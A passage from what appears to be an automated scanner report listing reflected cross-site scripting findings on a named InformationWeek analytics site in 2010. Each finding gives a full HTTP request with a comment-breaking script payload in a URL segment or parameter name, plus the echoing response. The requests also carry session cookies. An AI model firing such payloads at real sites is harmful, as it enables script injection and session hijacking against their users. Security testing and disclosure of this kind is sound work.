Path:   /menu/105/Healthcare/Healthcare.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ecec8--><script>alert(1)</script>296d0d5c564 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/105/Healthcare/Healthcare.html?ecec8--><script>alert(1)</script>296d0d5c564=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:44:43 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:43 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 48186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
care%2FHealthcare.html%3Fecec8--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E296d0d5c564%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html?ecec8--><script>alert(1)</script>296d0d5c564=1">
...[SNIP]...

3.61. http://analytics.informationweek.com/menu/106/Financial/Financial.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/106/Financial/Financial.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 35762--><script>alert(1)</script>26950b9f17e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu35762--><script>alert(1)</script>26950b9f17e/106/Financial/Financial.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 02:11:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:24 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
informationweek.com%2Fmenu35762--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E26950b9f17e%2F106%2FFinancial%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu35762--><script>alert(1)</script>26950b9f17e/106/Financial/Financial.html">
...[SNIP]...

3.62. http://analytics.informationweek.com/menu/106/Financial/Financial.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/106/Financial/Financial.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload a80e4--><script>alert(1)</script>b9fe4f616f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/106a80e4--><script>alert(1)</script>b9fe4f616f3/Financial/Financial.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 02:11:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
rmationweek.com%2Fmenu%2F106a80e4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb9fe4f616f3%2FFinancial%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106a80e4--><script>alert(1)</script>b9fe4f616f3/Financial/Financial.html">
...[SNIP]...

3.63. http://analytics.informationweek.com/menu/106/Financial/Financial.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/106/Financial/Financial.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 3bdd8--><script>alert(1)</script>74351014ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/106/Financial3bdd8--><script>alert(1)</script>74351014ad/Financial.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 02:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:11:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ek.com%2Fmenu%2F106%2FFinancial3bdd8--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E74351014ad%2FFinancial.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial3bdd8--><script>alert(1)</script>74351014ad/Financial.html">
...[SNIP]...

3.64. http://analytics.informationweek.com/menu/106/Financial/Financial.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/106/Financial/Financial.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 9221b--><script>alert(1)</script>bde86b314b0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/106/Financial/Financial.html9221b--><script>alert(1)</script>bde86b314b0 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 02:12:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:12:28 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
106%2FFinancial%2FFinancial.html9221b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebde86b314b0&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial/Financial.html9221b--><script>alert(1)</script>bde86b314b0">
...[SNIP]...

3.65. http://analytics.informationweek.com/menu/106/Financial/Financial.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/106/Financial/Financial.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b1f78--><script>alert(1)</script>119c5ed8843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/106/Financial/Financial.html?b1f78--><script>alert(1)</script>119c5ed8843=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 02:08:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 16:08:34 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 47931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
nancial%2FFinancial.html%3Fb1f78--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E119c5ed8843%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/106/Financial/Financial.html?b1f78--><script>alert(1)</script>119c5ed8843=1">
...[SNIP]...

3.66. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/13/Outsourcing-and-services/Outsourcing-services.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 280d2--><script>alert(1)</script>7fd66fc442e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu280d2--><script>alert(1)</script>7fd66fc442e/13/Outsourcing-and-services/Outsourcing-services.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
u280d2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7fd66fc442e%2F13%2FOutsourcing-and-services%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu280d2--><script>alert(1)</script>7fd66fc442e/13/Outsourcing-and-services/Outsourcing-services.html">
...[SNIP]...

3.67. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/13/Outsourcing-and-services/Outsourcing-services.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload f5cfa--><script>alert(1)</script>bc24ee3df37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/13f5cfa--><script>alert(1)</script>bc24ee3df37/Outsourcing-and-services/Outsourcing-services.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:44 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:44 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
F13f5cfa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebc24ee3df37%2FOutsourcing-and-services%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13f5cfa--><script>alert(1)</script>bc24ee3df37/Outsourcing-and-services/Outsourcing-services.html">
...[SNIP]...

3.68. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/13/Outsourcing-and-services/Outsourcing-services.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 9e007--><script>alert(1)</script>d20170e2eff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/13/Outsourcing-and-services9e007--><script>alert(1)</script>d20170e2eff/Outsourcing-services.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:55 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
vices9e007--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed20170e2eff%2FOutsourcing-services.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services9e007--><script>alert(1)</script>d20170e2eff/Outsourcing-services.html">
...[SNIP]...

3.69. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/13/Outsourcing-and-services/Outsourcing-services.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload bade7--><script>alert(1)</script>a6b7121472a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/13/Outsourcing-and-services/Outsourcing-services.htmlbade7--><script>alert(1)</script>a6b7121472a HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:50:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:50:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
es.htmlbade7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea6b7121472a&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.htmlbade7--><script>alert(1)</script>a6b7121472a">
...[SNIP]...

3.70. http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/13/Outsourcing-and-services/Outsourcing-services.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6d1b3--><script>alert(1)</script>ffaca7e1bef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/13/Outsourcing-and-services/Outsourcing-services.html?6d1b3--><script>alert(1)</script>ffaca7e1bef=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:45:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:00 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 54777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
3F6d1b3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Effaca7e1bef%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/13/Outsourcing-and-services/Outsourcing-services.html?6d1b3--><script>alert(1)</script>ffaca7e1bef=1">
...[SNIP]...

3.71. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/14/Regulatory-compliance/Regulatory-compliance.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3497a--><script>alert(1)</script>b14e7e078f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu3497a--><script>alert(1)</script>b14e7e078f4/14/Regulatory-compliance/Regulatory-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:14 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
enu3497a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb14e7e078f4%2F14%2FRegulatory-compliance%2FRegulatory-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu3497a--><script>alert(1)</script>b14e7e078f4/14/Regulatory-compliance/Regulatory-compliance.html">
...[SNIP]...

3.72. http://analytics.informationweek.com/menu/14/Regulatory-compliance/Regulatory-compliance.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/14/Regulatory-compliance/Regulatory-compliance.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8f0a9--><script>alert(1)</script>e0ead1f783e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/148f0a9--><script>alert(1)</script>e0ead1f783e/Regulatory-compliance/Regulatory-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
